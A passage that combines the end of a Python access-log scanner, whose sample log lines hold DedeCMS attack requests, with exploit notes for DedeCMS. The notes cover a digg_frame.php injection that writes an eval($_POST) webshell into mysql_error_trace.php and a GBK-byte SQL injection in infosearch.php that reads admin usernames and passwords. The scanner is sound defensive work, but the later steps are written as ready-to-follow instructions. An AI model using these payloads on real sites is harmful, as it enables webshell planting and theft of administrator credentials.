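    '10.0.0.5 - - [18/Oct/2012:10:42:52 +0800] "GET /dede/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST%5BGLOBALS%5D%5Bcfg_dbhost%5D=116.255.183.90&_POST%5BGLOBALS%5D%5Bcfg_dbuser%5D=root HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [18/Oct/2012:10:43:03 +0800] "POST /plus/mytag_js.php?aid=1 HTTP/1.1" 200 60 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [18/Oct/2012:10:43:15 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [18/Oct/2012:10:43:27 +0800] "POST /include/dialog/select_soft_post.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [18/Oct/2012:10:43:40 +0800] "GET /include/dialog/select_soft_post.php?cfg_basedir=../../&cfg_imgtype=php&job=upload&newname=fly.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hits, target in scan_access_log(SAMPLE_LOG):
        print(", ".join(hits), "<-", target)
```

Line 8 (the select_soft_post.php POST with every override in the body) produces nothing, which is the point: the rules catch the GET-borne variants, and body-borne overrides need inspection at the application or WAF layer, where the nested _COOKIE[GLOBALS] and cfg_* field names are just as easy to match.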
DedeCMS 5.3 - 5.5 plus/digg_frame.php injection vulnerability
This combines a MySQL numeric overflow error with the way DedeCMS logs database errors into a PHP file whose header performs no check.
1. Open the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
(URL truncated in the original post.) You should see the error message.

2. Open
http://www.abc.com/data/mysql_error_trace.php. Seeing the following proves the injection worked:
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
int(3) is the output of the injected var_dump(3): the PHP placed in the mid parameter runs whenever the trace file is requested. (gxeduw_ is the table prefix of the site the PoC was recorded against.)

3. Run test.html from dede.rar. Note that the form's action is the trace file:

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

Click OK; if the step-2 output appears, the shell has been planted.
DedeCMS plus/infosearch.php injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

The %cf in front of the quote is a GBK lead byte: on a GBK site it pairs with the backslash that escaping inserts before the quote, so the quote reaches MySQL unescaped and the union runs.